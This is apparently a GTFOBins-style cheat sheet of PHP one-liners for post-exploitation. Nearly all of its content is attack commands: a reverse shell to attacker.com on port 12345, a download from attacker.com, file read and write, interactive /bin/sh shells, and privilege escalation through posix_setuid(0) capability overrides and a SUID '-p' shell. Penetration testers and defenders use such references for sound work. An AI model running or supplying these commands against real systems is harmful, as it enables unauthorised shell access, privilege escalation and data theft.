php

Command Execution

php -r 'echo shell_exec("/path/to/command");'

php -r '$r=array(); exec("/path/to/command", $r); print(join("\n",$r));'

php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open("/path/to/command", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'

Download

php -r '$c=file_get_contents("http://attacker.com/path/to/input-file"); file_put_contents("/path/to/output-file", $c);'

File Read

php -r 'readfile("/path/to/input-file");'

File Write

php -r 'file_put_contents("/path/to/output-file", "DATA");'

Reverse Shell

php -r '$sock=fsockopen("attacker.com",12345);exec("/bin/sh -i 0<&3 1>&3 2>&3");'

Shell

php -r 'system("/bin/sh -i");'

CAPABILITIES override:

php -r 'posix_setuid(0); system("/bin/sh -i");'

php -r 'passthru("/bin/sh -i");'

CAPABILITIES override:

php -r 'posix_setuid(0); passthru("/bin/sh -i");'

php -r '$h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

CAPABILITIES override:

php -r 'posix_setuid(0); $h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

php -r 'pcntl_exec("/bin/sh");'

CAPABILITIES override:

php -r 'posix_setuid(0); pcntl_exec("/bin/sh");'

SUID override:

php -r 'pcntl_exec("/bin/sh", ["-p"]);'

Upload

php -S 0.0.0.0:80